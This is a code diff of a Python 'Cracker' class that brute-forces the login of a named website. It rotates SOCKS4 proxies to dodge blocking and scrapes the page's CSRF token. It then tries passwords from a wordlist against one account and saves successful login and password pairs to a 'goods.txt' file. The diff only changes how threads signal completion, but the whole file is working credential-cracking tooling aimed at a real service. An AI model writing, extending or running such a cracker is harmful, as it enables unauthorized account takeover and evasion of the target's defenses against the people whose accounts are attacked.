@@ -1,39 +1,37 @@
 from requests import session
-import time
 import re
 import os
+from ThreadStatic import ThreadStatic
 
 
 class Cracker:
-    def __init__(self, proxylist, login, passwords, passwordsids, threadname, staticdata):
+    def __init__(self, proxylist, login, passwords, passwordsids, threadname):
         self.threadname = threadname
         self.proxylist = proxylist
         self.login = login
         self.passwords = passwords
         self.passwordsids = passwordsids
         self.counter = 0
-        self.last_password = None
         self.proxy = None
-        self.staticdata = staticdata
         self.session_get()
 
     def session_get(self):
-        if self.staticdata.Status() == True:
+        if ThreadStatic.Done is True:
             return
 
         r = session()
-        self.proxy = self.proxylist.pop()
-
-        if len(self.proxylist) == 0:
-            print('\n\nI have spent all proxies. Please update them.')
+        if len(self.proxylist) is 0:
+            print('\n\n# {}: I have spent all proxies. Please update them.'.format(self.threadname))
             return
+        self.proxy = self.proxylist.pop()
 
         try:
             r.proxies = {'socks4': 'socks4://' + self.proxy}
             data = r.get('https://shadowservants.ru/login', timeout=5).text
             reg = re.findall(r'<meta name=\"csrf_token\" content=\"[A-Za-z0-9.-]+\" />', data)
             if len(str(reg)) < 3:
-                time.sleep(1)
+                if ThreadStatic.Done is True:
+                    return
                 print('Looks like bad proxy: {} I\'ll repair it.'.format(self.proxy))
                 self.session_get()
             csrf = str(reg).split()[2]
@@ -41,12 +39,13 @@ class Cracker:
             csrf = csrf[1].replace('"', '')
             self.auth(r, csrf)
         except:
-            time.sleep(1)
+            if ThreadStatic.Done is True:
+                return
             print('Looks like bad proxy: {} I\'ll repair it.'.format(self.proxy))
             self.session_get()
 
     def auth(self, r, csrf):
-        if self.staticdata.Status() == True:
+        if ThreadStatic.Done is True:
             return
 
         f = open(self.passwords, 'r', encoding='utf-8')
@@ -78,21 +77,23 @@ class Cracker:
                         f = open('./workout/goods.txt', 'a', encoding='utf-8')
                         f.write('Good: ' + self.login + "|" + password + '\n')
                         f.close()
-                        self.staticdata.Stop()
                     except:
                         print('\nCan\'t save results. Ok, I just say it here.\n')
                     print("\n\nNicely done! Password for \"{}\" is \"{}\"".format(self.login, password))
-                    self.staticdata.Stop()
                     raise KeyboardInterrupt
                 else:
+                    if ThreadStatic.Done is True:
+                        return
                     print('Bad attempt with the "{}" password.'.format(password))
                 password = f.readline()
                 self.counter += 1
             except KeyboardInterrupt:
                 f.close()
+                ThreadStatic.Done = True
                 return
             except:
-                time.sleep(1)
+                if ThreadStatic.Done is True:
+                    return
                 print('Looks like bad proxy: {} I\'ll repair it.'.format(self.proxy))
                 f.close()
                 self.session_get()
